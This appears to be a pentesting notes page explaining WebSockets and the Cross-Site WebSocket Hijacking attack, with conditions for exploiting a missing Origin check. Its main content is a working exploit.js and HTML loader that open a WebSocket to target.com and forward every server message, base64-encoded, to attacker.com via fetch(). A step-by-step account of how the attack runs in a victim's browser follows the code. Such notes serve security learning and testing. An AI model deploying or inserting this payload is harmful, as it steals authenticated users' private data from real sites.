WebSockets
WebSockets let the browser and server talk to each other at the same time using one connection that stays open. After a handshake, the connection stays active, and both sides can send messages whenever they want — like a two-way conversation. The server can also send updates to the browser right away when something happens.
- Web Socket secure:
wss:// ws://: data is sent without encryption
Exploit
Section titled “Exploit”Cross-Site WebSocket Hijacking
Section titled “Cross-Site WebSocket Hijacking”Identify the server doesn’t validate origin header by
- Spoof the
Originheader - Check auth cookies
samesiteflag is set to None
Note: it is not possible to exploit CSWSH if the victim uses Firefox, due to Total Cookie Protection.
s
exploit.js
<script> //Establish the WebSocket connection const ws = new WebSocket('wss://target.com/chat');
// Send a message to the server once connected ws.onopen = () => { ws.send("READY"); };
// Handle messages received from the server ws.onmessage = (event) => { fetch('https://attacker.com?msg=' + btoa(event.data)); };</script><html> <head></head> <body><script src="https://attacker.com/exploit.js"></script></body></html>- User opens the malicious HTML page.
- JavaScript runs automatically in the background and creates a WebSocket connection to the target server.
- Once connected, the victim’s browser sends
READY - When the server replies, the script:
- Receives the message
- Encodes it as base64 with
btoa(...) - Sends it to the attacker’s server using:
fetch('https://attacker.com?msg=' + btoa(event.data));